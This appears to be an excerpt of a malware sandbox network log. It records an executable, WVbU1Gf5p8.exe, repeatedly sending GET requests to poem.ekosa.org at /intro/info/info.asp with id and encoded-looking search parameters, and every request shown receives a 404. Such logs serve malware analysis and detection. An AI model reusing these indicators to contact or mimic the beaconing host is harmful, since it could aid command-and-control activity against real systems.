      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      75192.168.2.449845210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:40.754378080 CET576OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:41.013569117 CET577INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:40 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      76192.168.2.449846210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:41.293981075 CET578OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:41.566473007 CET578INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:41 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      77192.168.2.449847210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:41.845242977 CET579OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:42.114115953 CET580INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:41 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      78192.168.2.449848210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:42.500201941 CET581OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:42.760907888 CET581INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:42 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      79192.168.2.449849210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:43.033344984 CET582OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:43.296571016 CET582INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:42 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      8192.168.2.449768210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:01.223732948 CET133OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:01.488401890 CET137INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:01 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      80192.168.2.449850210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:43.566813946 CET583OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:43.826807022 CET584INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:43 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      81192.168.2.449851210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:44.199999094 CET584OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:44.463160992 CET585INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:43 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      82192.168.2.449852210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:44.730411053 CET586OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:44.990772009 CET586INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:44 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      83192.168.2.449853210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:45.259469986 CET587OUTGET /intro/info/info.asp?search=2tjbpK6urq6urq6u HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:45.522773027 CET588INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:44 GMT
      Connection: close
      Content-Length: 315
      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


      Session IDSource IPSource PortDestination IPDestination PortProcess
      84192.168.2.449854210.116.91.8080C:\Users\user\Desktop\WVbU1Gf5p8.exe
      TimestampkBytes transferredDirectionData
      Jan 11, 2021 17:55:45.909315109 CET588OUTGET /intro/info/info.asp?id=dn678 HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: poem.ekosa.org
      Connection: Keep-Alive
      Jan 11, 2021 17:55:46.173079967 CET589INHTTP/1.1 404 Not Found
      Content-Type: text/html; charset=us-ascii
      Server: Microsoft-HTTPAPI/2.0
      Date: Mon, 11 Jan 2021 16:55:46 GMT
      Connection: close
      Content-Length: 315
